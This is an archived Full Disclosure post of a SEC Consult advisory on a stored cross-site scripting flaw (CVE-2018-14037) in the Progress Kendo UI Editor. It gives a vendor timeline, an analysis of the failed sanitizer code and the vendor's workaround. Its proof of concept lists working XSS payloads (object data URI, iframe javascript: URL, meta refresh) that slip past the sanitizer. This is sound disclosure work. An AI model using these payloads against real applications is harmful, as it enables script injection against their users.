[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
From: SEC Consult Vulnerability Lab <research () sec-consult ! com>
Date: 2018-09-26 12:19:31
Message-ID: fc9866c6-04d8-c07f-caff-2b756d8737fa () sec-consult ! com
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
here with correct email subject :)
On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> =======================================================================
> title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
> vulnerable version: v2018.1.221
> fixed version: none, see workaround
> CVE number: CVE-2018-14037
> impact: medium
> homepage: https://www.progress.com/kendo-ui
> found: 2018-04-23
> by: M. Tomaselli (Office Munich)
> SEC Consult Vulnerability Lab
>
> An integrated part of SEC Consult
> Europe | Asia | North America
>
> https://www.sec-consult.com
>
> =======================================================================
>
> Vendor description:
> -------------------
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
>
> https://www.telerik.com/kendo-ui/editor
>
>
> Business recommendation:
> ------------------------
> SEC Consult recommends to implement the workarounds provided by the vendor.
>
>
> Vulnerability overview/description:
> -----------------------------------
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
>
>
> Proof of concept:
> -----------------
> The following, incomplete list, of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
>
>
> <object
> data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+"></object>
> <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
> <META
> HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
>
>
>
> After a click on the button the setValue function on line 513 of the beautified
> "api.js" is called:
>
> var setValue = function () {
> editor.value($("#value").val());
> };
>
>
> The value function is implemented in line 64383 of the beautified "kendo.all.js"
> file and defined as:
>
> value: function (html) {
> var body = this.body, editorNS = kendo.ui.editor, options =
> this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
> options.serialization);
> if (html === undefined) {
> return currentHtml;
> }
> if (html == currentHtml) {
> return;
> }
> editorNS.Serializer.htmlToDom(html, body, options.deserialization);
> this.selectionRestorePoint = null;
> this.update();
> this.toolbar.refreshTools();
> },
>
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
>
> var Serializer = {
> toEditableHtml: function (html) {
> return (html || '').replace(/<!\[CDATA\[(.*)?\]\]>/g,
> '<!--[CDATA[$1]]-->').replace(/<(\/?)script([^>]*)>/gi,
> '<$1k:script$2>').replace(/<img([^>]*)>/gi, function (match) {
> return match.replace(onerrorRe, '');
> }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
> '$1').replace(/^<(table|blockquote)/i, br +
> '<$1').replace(/^[\s]*( |\u00a0)/i, '$1').replace(/<\/(table|blockquote)>$/i,
> '</$1>' + br);
> },
>
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data uri payload. The payload is
> added unescaped to the editor DOM after several other functions calls.
>
>
> Vulnerable / tested versions:
> -----------------------------
> The following version has been identified to be vulnerable:
> * v2018.1.221
>
>
> Vendor contact timeline:
> ------------------------
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered through unencrypted email to vendor
> 2018-05-29: Contacting vendor for current status and informing them about the
> publishing date
> 2018-07-02: Reminded the vendor that the advisory will be published soon
> 2018-07-02: Multiple emails exchanged, vendor demands that customers need to
> issue a support ticket on this case
> 2018-07-03: Telling them that it is a security issue they already know two months
> without seemingly acting upon it.
> Vendor: product managers have been informed and will contact us;
> no further info
> 2018-07-11: Asking vendor again for a status update & patch information
> 2018-07-11: Vendor: "Thank you for following up. I have sent this to the product
> team to take into consideration. They will be following up with you as
> they may need. We appreciate you following up regarding this request."
> 2018-07-12: Detailed answer from vendor regarding workaround
> 2018-07-13: Requested CVE number
> 2018-09-26: Public release of security advisory
>
>
> Solution:
> ---------
> There is no fix available from the vendor. Check the vendor's website for
> potential future updates.
>
>
> Workaround:
> -----------
> The following workaround was provided by the vendor which has to be extended in
> order to mitigate all of the above mentioned payloads.
>
> ```quote
> First, one thing to keep in mind with the Kendo UI Editor is that since it is
> a HTML editor that many users implement in order take advantage of HTML content
> (compared to straight text). This means that while we often sanitize many
> things (script tags, DOM event attributes, etc.) in order to prevent
> cross-site scripting [...] there are certain cases that we cannot automatically
> sanitize because of use cases that customers of ours have – this being one of
> them.
>
> Because the value that is set to the Editor is done through the jQuery method
> `$("#value").val()` it is possible to sanitize or encode values before being
> set to the editor.
>
> This is can be done through implementing some custom sanitations through the
> `serialization.custom
> <https://docs.telerik.com/kendo-ui/api/javascript/ui/editor/configuration/serialization.custom>`,
> and
> `deserialization.custom<https://docs.telerik.com/kendo-ui/api/javascript/ui/editor/configuration/deserialization>`,
> options available in the Editor today.
> ```
>
> ```html
> <!DOCTYPE html>
> <html>
> <head>
> <meta charset="utf-8">
> <title>Untitled</title>
>
> <link rel="stylesheet"
> href="https://kendo.cdn.telerik.com/2018.2.620/styles/kendo.common.min.css">
> <link rel="stylesheet"
> href="https://kendo.cdn.telerik.com/2018.2.620/styles/kendo.rtl.min.css">
> <link rel="stylesheet"
> href="https://kendo.cdn.telerik.com/2018.2.620/styles/kendo.default.min.css">
> <link rel="stylesheet"
> href="https://kendo.cdn.telerik.com/2018.2.620/styles/kendo.mobile.all.min.css">
>
> <script src="https://code.jquery.com/jquery-1.12.3.min.js"></script>
> <script src="https://kendo.cdn.telerik.com/2018.2.620/js/angular.min.js"></script>
> <script src="https://kendo.cdn.telerik.com/2018.2.620/js/jszip.min.js"></script>
> <script
> src="https://kendo.cdn.telerik.com/2018.2.620/js/kendo.all.min.js"></script></head>
> <body>
> <textarea id="editor"></textarea>
> <script>
> function sanitizeHtml(html) {
> var temp = $("<div></div>").html(html);
> temp.find("object").remove();
> return temp.html() || "\ufeff";
> }
>
> $("#editor").kendoEditor({
> tools: [
> "viewHtml"
> ],
> deserialization: {
> custom: function(html) {
> return sanitizeHtml(html);
> }
> },
> serialization: {
> custom: function(html) {
> return sanitizeHtml(html);
> }
> }
> });
>
> var editor = $("#editor").getKendoEditor();
>
> editor.value('<object
> data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+"></object>');
> console.log(editor.value());
> </script>
> </body>
> </html>
> ```
>
>
> Advisory URL:
> -------------
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> SEC Consult Vulnerability Lab
>
> SEC Consult
> Europe | Asia | North America
>
> About SEC Consult Vulnerability Lab
> The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
> ensures the continued knowledge gain of SEC Consult in the field of network
> and application security to stay ahead of the attacker. The SEC Consult
> Vulnerability Lab supports high-quality penetration testing and the evaluation
> of new offensive and defensive technologies for our customers. Hence our
> customers obtain the most current information about vulnerabilities and valid
> recommendation about the risk profile of new technologies.
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Interested to work with the experts of SEC Consult?
> Send us your application https://www.sec-consult.com/en/career/index.html
>
> Interested in improving your cyber security with the experts of SEC Consult?
> Contact our local offices https://www.sec-consult.com/en/contact/index.html
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Mail: research at sec-consult dot com
> Web: https://www.sec-consult.com
> Blog: http://blog.sec-consult.com
> Twitter: https://twitter.com/sec_consult
>
> EOF M. Tomaselli / @2018
>
["smime.p7s" (application/pkcs7-signature)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic